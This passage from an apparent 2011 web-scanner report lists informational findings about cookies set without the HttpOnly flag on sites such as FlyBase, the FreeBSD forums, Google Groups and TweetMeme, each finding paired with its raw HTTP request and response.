The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reports/FBgn0000146.html/x22 HTTP/1.1
Host: flybase.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:51 GMT
Server: Apache/1.3.26
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 24 Jan 2011 15:11:51 GMT
Content-Type: text/html;charset=UTF-8
set-cookie: BALANCEID=balancer.chervil; path=/;
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 493133


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv
...[SNIP]...

14.267. http://forums.freebsd.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.freebsd.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • bblastvisit=1295881916; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: forums.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:56 GMT
Server: Apache/2.2.17 (FreeBSD)
Set-Cookie: bblastvisit=1295881916; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 15:11:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 50678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...

14.268. http://foxaudiencenetwork.122.2o7.net/b/ss/fan-foxaudience/1/H.20.3/s68358821158763

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foxaudiencenetwork.122.2o7.net
Path:   /b/ss/fan-foxaudience/1/H.20.3/s68358821158763

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • s_vi=[CS]v1|269F65E9851D1546-40000138C04118F2[CE]; Expires=Sun, 24 Jan 2016 13:10:43 GMT; Domain=foxaudiencenetwork.122.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/fan-foxaudience/1/H.20.3/s68358821158763?AQB=1&ndh=1&t=25/0/2011%207%3A10%3A44%202%20360&ce=ISO-8859-1&ns=foxaudiencenetwork&pageName=FAN%3AHomePage&g=http%3A//www.foxaudiencenetwork.com/&cc=USD&ch=HomePage&server=www.foxaudiencenetwork.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: foxaudiencenetwork.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.foxaudiencenetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:10:43 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269F65E9851D1546-40000138C04118F2[CE]; Expires=Sun, 24 Jan 2016 13:10:43 GMT; Domain=foxaudiencenetwork.122.2o7.net; Path=/
Location: http://foxaudiencenetwork.122.2o7.net/b/ss/fan-foxaudience/1/H.20.3/s68358821158763?AQB=1&pccr=true&vidn=269F65E9851D1546-40000138C04118F2&&ndh=1&t=25/0/2011%207%3A10%3A44%202%20360&ce=ISO-8859-1&ns=foxaudiencenetwork&pageName=FAN%3AHomePage&g=http%3A//www.foxaudiencenetwork.com/&cc=USD&ch=HomePage&server=www.foxaudiencenetwork.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Mon, 24 Jan 2011 13:10:43 GMT
Last-Modified: Wed, 26 Jan 2011 13:10:43 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www398
Content-Length: 0
Content-Type: text/plain


14.269. http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gegnia.com
Path:   /joomla/informacion/mbrriti-joomla-1-pik-6

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 22bae4d6bb8978acd20b7a9dac0f3f85=ovtfp6obggr08kcq0mtis1qq55; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla/informacion/mbrriti-joomla-1-pik-6 HTTP/1.1
Host: gegnia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 22bae4d6bb8978acd20b7a9dac0f3f85=ovtfp6obggr08kcq0mtis1qq55; path=/
Last-Modified: Mon, 24 Jan 2011 15:11:50 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sq-al" lang="sq-al" dir=
...[SNIP]...

14.270. https://github.com/DataSift/TweetMeme-Chrome-Extension

Summary

Severity:   Information
Confidence:   Certain
Host:   https://github.com
Path:   /DataSift/TweetMeme-Chrome-Extension

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DataSift/TweetMeme-Chrome-Extension HTTP/1.1
Host: github.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:00:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "ed993b0b64e19e7dbc6254707982dc48"
X-Runtime: 124ms
Content-Length: 40811
Set-Cookie: csrf_id=17b8d0887bd3f6e545eb80196d7df266; path=/
Set-Cookie: _gh_sess=BAh7BzoRbG9jYWxlX2d1ZXNzIgdlbiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--e0bd7516c66d61afc1315d8c70aa3e9910534a77; path=/; expires=Fri, 01 Jan 2021 00:00:00 GMT; secure; HttpOnly
Cache-Control: private, max-age=0, must-revalidate


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...

14.271. http://goto.ext.google.com/og-dogfood-issue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goto.ext.google.com
Path:   /og-dogfood-issue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • S=apphosting=xoAZxMqRaa6zR0f9f5WNwA; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-dogfood-issue HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-dogfood-issue
Set-Cookie: S=apphosting=xoAZxMqRaa6zR0f9f5WNwA; path=/
Date: Mon, 24 Jan 2011 22:35:55 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close


14.272. http://goto.ext.google.com/og-exp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goto.ext.google.com
Path:   /og-exp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • S=apphosting=m36BQtRaQ0k7rP0DZWfNAg; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /og-exp HTTP/1.1
Host: goto.ext.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: https://goto.google.com/og-exp
Set-Cookie: S=apphosting=m36BQtRaQ0k7rP0DZWfNAg; path=/
Date: Mon, 24 Jan 2011 22:35:56 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: Google Frontend
Content-Length: 0
Connection: close


14.273. http://green.autobytel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://green.autobytel.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • cweb=JONQJVS10.4.128.192CKMMI; path=/
  • USER_UUID_VCH=45B1050B%2DCA19%2DA839%2DE9A7BDE5F665AC56;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
  • TIME=%7Bts%20%272011%2D01%2D24%2014%3A35%3A00%27%7D;path=/
  • TIME=%7Bts%20%272011%2D01%2D24%2018%3A36%3A00%27%7D;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
  • ID=27696%3Bhybd;path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: green.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: USER_UUID_VCH=45B1050B%2DCA19%2DA839%2DE9A7BDE5F665AC56;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2014%3A35%3A00%27%7D;path=/
Set-Cookie: COUNT=1;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2018%3A36%3A00%27%7D;expires=Wed, 16-Jan-2041 22:36:00 GMT;path=/
Set-Cookie: ID=27696%3Bhybd;path=/
Set-Cookie: HOMEVERSION=2;path=/
Date: Mon, 24 Jan 2011 22:36:00 GMT
Connection: close
Content-Length: 31347

<!-- CWEB429 --><!-- green -->

<html>

<head>


<title>New Cars | Used Cars for Sale | New and Used Car Prices</title>

<!-- meta -->

<meta name="description" content="New cars, used cars: prices
...[SNIP]...

14.274. http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/alt.slack/msg/fa1fe1e3e6c31c9b/x22 HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d88e74c2ce639c72:TM=1295908559:LM=1295908559:S=1dDmt8z2wKvU3vZb; expires=Wed, 23-Jan-2013 22:35:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:59 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

14.275. http://groups.google.com/group/joomla-commits/topics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /group/joomla-commits/topics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:58 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

14.276. http://groups.google.com/groups

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /groups

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=2b64ca1fcad5a4bd:TM=1295908564:LM=1295908564:S=MyGWGTVSpmzhW4bn; expires=Wed, 23-Jan-2013 22:36:04 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: DiscussionFE
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>Google Groups</title><link href="/groups/search_static/u7kY4_DCZv8/dfe.css" rel="stylesheet" type="text/css"><style>
...[SNIP]...

14.277. http://groups.google.com/grphp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=d51180940e0c5c74:TM=1295908560:LM=1295908561:S=YmAugaRj6BceMOsC; expires=Wed, 23-Jan-2013 22:36:01 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:36:01 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

14.278. http://gsas.harvard.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsas.harvard.edu
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • cb77073be2d435002988db5e6e1c1bab=hlaugf5hcca71ner7h6670p4h1; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: gsas.harvard.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: cb77073be2d435002988db5e6e1c1bab=hlaugf5hcca71ner7h6670p4h1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:36:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9792

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...

14.279. http://hairmakeup.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hairmakeup.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hairmakeup.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:01:46 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=7db031caf49ce4f498af46ce33d5f0b8; expires=Tue, 01-Feb-2011 15:01:46 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0050179958343506
X-Served-In: 0.084240913391113
X-Served-By: ded2059
Content-Length: 42145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.280. http://homepage.mac.com/yukikun/software/slimbox_ex/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://homepage.mac.com
Path:   /yukikun/software/slimbox_ex/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • mmr=nk11r10; Domain=homepage.mac.com; Path=/yukikun
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yukikun/software/slimbox_ex/ HTTP/1.1
Host: homepage.mac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: AppleIDiskServer.1G3010
x-responding-server: hpng005-0
Location: http://www.me.com/account_error.html
Content-Length: 0
Date: Tue, 25 Jan 2011 15:02:51 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/yukikun


14.281. http://howto.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://howto.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: howto.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 15:04:18 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=908daf5468448936a1c04e5a863cab70; expires=Tue, 01-Feb-2011 15:04:18 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0045561790466309
X-Served-In: 0.051589965820312
X-Served-By: h04
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

14.282. http://idpix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • clid=2lebnns011706ch47d7o8wtv18fgn00h0o03050310g; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • rdrlst=20z0so2ylebnns0000000h0o03050310g7dpletz4d0000000d0o03050310d10flfk1rn000000020o020502102mmnlebnns0000000h0o03050310g10elfk1rn000000020o020502102x1blebnns0000000h0o03050310gxo1lebnns0000000h0o03050310geh5lf17qf000000090o0305031096bylemlne0000000f0o03050310fw3clebnns0000000h0o03050310g7gmlebnns0000000h0o03050310gjv6lebnns0000000h0o03050310gj4ilew2e20000000b0o03050310bxthlebnns0000000h0o03050310gfullf8gij000000050o0305031050c9lfk1rn000000020o020502102jillebnns0000000h0o03050310gfuqlegh2b0000000g0o03050310gb6mlf17qk000000080o030503108mz1lebnns0000000h0o03050310gcajlfk1rn000000020o020502102p7vlebnns0000000h0o03050310g7vglfk1rn000000020o020502102xvslebnns0000000h0o03050310g10rlfjpei000000030o030503103xuklebnns0000000h0o03050310gjk7lebnns0000000h0o03050310gx1jlebnns0000000h0o03050310gyiplebnns0000000h0o03050310gcbnlfk1rn000000020o020502102xwflebnns0000000h0o03050310gyh0lebnns0000000h0o03050310ge4vlebnns0000000h0o03050310gxwblebnns0000000h0o03050310gjwblfk1rn000000020o020502102; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
  • sglst=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; Domain=media6degrees.com; Expires=Sun, 24-Jul-2011 02:05:03 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=4845 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lf8gij0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=015020a0e0f0g1lebnnsxzt1181qqxzt1181qqxzt1181qqxzt1181qq; vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; clid=2lebnns011706ch47d7o8wtv18e3v00g0o02050210f; orblb=2lfk1rn012dh10u0100000; rdrlst=2110s7dpletz4d0000000c0o02050210co2ylebnns0000000g0o02050210f10elfk1rn000000010o010501101mmnlebnns0000000g0o02050210fxo1lebnns0000000g0o02050210fx1blebnns0000000g0o02050210feh5lf17qf000000080o0205021086bylemlne0000000e0o02050210ew3clebnns0000000g0o02050210f7gmlebnns0000000g0o02050210fjv6lebnns0000000g0o02050210fj4ilew2e20000000a0o02050210axthlebnns0000000g0o02050210ffullf8gij000000040o02050210410flfk1rn000000010o0105011010c9lfk1rn000000010o010501101jillebnns0000000g0o02050210ffuqlegh2b0000000f0o02050210fb6mlf17qk000000070o020502107mz1lebnns0000000g0o02050210fcajlfk1rn000000010o010501101p7vlebnns0000000g0o02050210f7vglfk1rn000000010o010501101xvslebnns0000000g0o02050210f10elfk1rn000000010o01050110110rlfjpei000000020o020502102xuklebnns0000000g0o02050210fx1jlebnns0000000g0o02050210fjk7lebnns0000000g0o02050210fcbnlfk1rn000000010o010501101yiplebnns0000000g0o02050210fyh0lebnns0000000g0o02050210fxwflebnns0000000g0o02050210fe4vlebnns0000000g0o02050210f1